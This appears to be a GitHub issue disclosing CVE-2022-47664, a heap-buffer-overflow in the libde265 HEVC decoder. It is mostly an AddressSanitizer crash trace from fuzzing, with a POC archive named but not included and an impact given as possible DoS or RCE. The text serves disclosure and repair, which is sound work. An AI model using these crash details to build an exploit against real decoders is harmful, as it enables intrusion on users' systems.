    WARNING: maximum number of reference pictures exceeded
    =================================================================
    ==733371==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61b00000d190 at pc 0x7f929c8bfbbc bp 0x7ffcdcf97080 sp 0x7ffcdcf97070
    READ of size 16 at 0x61b00000d190 thread T0
        #0 0x7f929c8bfbbb in ff_hevc_put_hevc_qpel_pixels_8_sse(short*, long, unsigned char const*, long, int, int, short*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x2b6bbb)
        #1 0x7f929c7b249f in acceleration_functions::put_hevc_qpel(short*, long, void const*, long, int, int, short*, int, int, int) const (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1a949f)
        #2 0x7f929c7b35a7 in void mc_luma<unsigned char>(base_context const*, seq_parameter_set const*, int, int, int, int, short*, int, unsigned char const*, int, int, int, int) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1aa5a7)
        #3 0x7f929c7a4a8b in generate_inter_prediction_samples(base_context*, slice_segment_header const*, de265_image*, int, int, int, int, int, int, int, PBMotion const*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x19ba8b)
        #4 0x7f929c7b1a2e in decode_prediction_unit(base_context*, slice_segment_header const*, de265_image*, PBMotionCoding const&, int, int, int, int, int, int, int, int) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1a8a2e)
        #5 0x7f929c7ef80b in read_coding_unit(thread_context*, int, int, int, int) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1e680b)
        #6 0x7f929c7f1762 in read_coding_quadtree(thread_context*, int, int, int, int) [clone .localalias] (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1e8762)
        #7 0x7f929c7f1675 in read_coding_quadtree(thread_context*, int, int, int, int) [clone .localalias] (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1e8675)
        #8 0x7f929c7f1610 in read_coding_quadtree(thread_context*, int, int, int, int) [clone .localalias] (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1e8610)
        #9 0x7f929c7f15a3 in read_coding_quadtree(thread_context*, int, int, int, int) [clone .localalias] (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1e85a3)
        #10 0x7f929c7e8d49 in read_coding_tree_unit(thread_context*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1dfd49)
        #11 0x7f929c7f1f06 in decode_substream(thread_context*, bool, bool) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1e8f06)
        #12 0x7f929c7f3c3f in read_slice_segment_data(thread_context*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1eac3f)
        #13 0x7f929c746e6f in decoder_context::decode_slice_unit_sequential(image_unit*, slice_unit*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x13de6f)
        #14 0x7f929c747673 in decoder_context::decode_slice_unit_parallel(image_unit*, slice_unit*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x13e673)
        #15 0x7f929c746311 in decoder_context::decode_some(bool*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x13d311)
        #16 0x7f929c74605b in decoder_context::read_slice_NAL(bitreader&, NAL_unit*, nal_header&) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x13d05b)
        #17 0x7f929c748be6 in decoder_context::decode_NAL(NAL_unit*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x13fbe6)
        #18 0x7f929c74924c in decoder_context::decode(int*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x14024c)
        #19 0x7f929c72f3f2 in de265_decode (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1263f2)
        #20 0x5613fc1319a5 in main (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/dec265/dec265+0x79a5)
        #21 0x7f929c0d7d8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
        #22 0x7f929c0d7e3f in __libc_start_main_impl ../csu/libc-start.c:392
        #23 0x5613fc12f7c4 in _start (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/dec265/dec265+0x57c4)
    
    0x61b00000d190 is located 0 bytes to the right of 1552-byte region [0x61b00000cb80,0x61b00000d190)
    allocated by thread T0 here:
        #0 0x7f929ca5755c in __interceptor_posix_memalign ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:226
        #1 0x7f929c78aa61 in ALLOC_ALIGNED(unsigned long, unsigned long) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x181a61)
        #2 0x7f929c78b202 in de265_image_get_buffer(void*, de265_image_spec*, de265_image*, void*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x182202)
        #3 0x7f929c78d66b in de265_image::alloc_image(int, int, de265_chroma, std::shared_ptr<seq_parameter_set const>, bool, decoder_context*, long, void*, bool) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x18466b)
        #4 0x7f929c7709fa in decoded_picture_buffer::new_image(std::shared_ptr<seq_parameter_set const>, decoder_context*, long, void*, bool) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1679fa)
        #5 0x7f929c749fd4 in decoder_context::generate_unavailable_reference_picture(seq_parameter_set const*, int, bool) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x140fd4)
        #6 0x7f929c74cee1 in decoder_context::process_reference_picture_set(slice_segment_header*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x143ee1)
        #7 0x7f929c75046a in decoder_context::process_slice_segment_header(slice_segment_header*, de265_error*, long, nal_header*, void*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x14746a)
        #8 0x7f929c745970 in decoder_context::read_slice_NAL(bitreader&, NAL_unit*, nal_header&) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x13c970)
        #9 0x7f929c748be6 in decoder_context::decode_NAL(NAL_unit*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x13fbe6)
        #10 0x7f929c74924c in decoder_context::decode(int*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x14024c)
        #11 0x7f929c72f3f2 in de265_decode (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1263f2)
        #12 0x5613fc1319a5 in main (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/dec265/dec265+0x79a5)
        #13 0x7f929c0d7d8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x2b6bbb) in ff_hevc_put_hevc_qpel_pixels_8_sse(short*, long, unsigned char const*, long, int, int, short*)
    Shadow bytes around the buggy address:
      0x0c367fff99e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c367fff99f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c367fff9a00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c367fff9a10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c367fff9a20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x0c367fff9a30: 00 00[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c367fff9a40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c367fff9a50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c367fff9a60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c367fff9a70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c367fff9a80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==733371==ABORTING
    

**POC**

660.zip

**Impact**

Potentially causing DoS and RCE

**Credit**

Xdchase

CVE-2022-47664: heap-buffer-overflow (libde265/build/libde265/libde265.so+0x2b6bbb) in ff_hevc_put_hevc_qpel_pixels_8_sse(short*, long, unsigned char const*, long, int, int, short*) · Issue #368 · strukturag/libde265

Tag

#rce